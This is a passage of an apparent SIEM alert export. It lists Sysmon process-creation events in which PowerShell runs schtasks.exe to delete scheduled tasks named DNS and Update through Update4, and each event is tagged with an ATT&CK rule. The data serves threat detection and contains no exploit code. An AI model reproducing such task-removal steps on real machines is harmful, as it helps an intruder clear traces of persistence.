Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.513",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.585 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ce162700} +ProcessId: 2644 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.588290400Z"",""eventRecordID"":""3064"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.585\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010ce162700}\r\nProcessId: 2644\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.585"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010ce162700}"",""processId"":""2644"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.494",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.554 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f3142700} +ProcessId: 7580 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.559697500Z"",""eventRecordID"":""3063"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.554\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f3142700}\r\nProcessId: 7580\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.554"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f3142700}"",""processId"":""7580"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.478",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.521 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f6122700} +ProcessId: 7776 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.524591700Z"",""eventRecordID"":""3062"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.521\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f6122700}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.521"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f6122700}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:19:29.462",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.487 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001023112700} +ProcessId: 5956 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.492464100Z"",""eventRecordID"":""3061"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.487\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001023112700}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.487"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001023112700}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.448",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.456 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00104d0f2700} +ProcessId: 7296 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.460000700Z"",""eventRecordID"":""3060"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.456\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-00104d0f2700}\r\nProcessId: 7296\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.456"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-00104d0f2700}"",""processId"":""7296"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.431",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.426 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010be0d2700} +ProcessId: 7088 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.432551600Z"",""eventRecordID"":""3059"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.426\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010be0d2700}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:01.426"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010be0d2700}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 